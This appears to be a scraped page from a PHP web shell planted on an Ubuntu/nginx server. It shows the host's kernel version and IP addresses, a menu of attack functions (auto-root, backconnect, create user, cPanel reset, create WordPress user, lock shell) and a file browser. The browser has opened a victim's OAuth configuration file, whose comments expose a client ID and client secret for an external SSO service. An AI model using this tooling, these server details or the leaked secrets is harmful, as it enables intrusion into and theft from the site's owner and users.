Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-client /
app /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
app.api.tsx
500
B
-rw-rw-r--
app.dev.tsx
64
B
-rwxrwxr-x
app.github.tsx
1.01
KB
-rwxrwxr-x
app.mock.tsx
353
B
-rwxrwxr-x
app.oauth-code.tsx
1.41
KB
-rwxrwxr-x
app.oauth-password.tsx
837
B
-rwxrwxr-x
app.prod.tsx
64
B
-rwxrwxr-x
common.tsx
312
B
-rw-rw-r--
index.tsx
2.21
KB
-rwxrwxr-x
routes.tsx
1.01
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : app.oauth-code.tsx
import { Config, AuthType } from '.'; const config: Config = { authType: AuthType.OAuth, authConfig: { clientId: 'foo', clientSecret: '1', authorizationUri: 'http://localhost:9110/oauth/authorize?response_type=code&client_id={clientId}&redirect_uri={callbackUri}&&scope={scope}', accessTokenUri: 'http://localhost:9110/oauth/token?client_id={clientId}&client_secret={clientSecret}&grant_type=authorization_code&code={code}&redirect_uri={callbackUri}', userProfileUri: 'http://localhost:9110/oauth/me', logoutUri: 'http://localhost:9110/oauth/logout', // clientId: "188c0da703", // clientSecret: "f3dd317369ae622113f0", // authorizationUri: "https://cloud.bndy.net/service-sso/oauth/authorize?response_type=code&client_id={clientId}&redirect_uri={callbackUri}&&scope={scope}", // accessTokenUri: "https://cloud.bndy.net/service-sso/oauth/token?client_id={clientId}&client_secret={clientSecret}&grant_type=authorization_code&code={code}&redirect_uri={callbackUri}", // userProfileUri: "https://cloud.bndy.net/service-sso/oauth/me", // logoutUri: "https://cloud.bndy.net/service-sso/oauth/logout", scope: 'user_info', }, userConverter: (backendUser: any) => { return { name: backendUser.username, email: backendUser.email, }; }, }; module.exports = config;
Close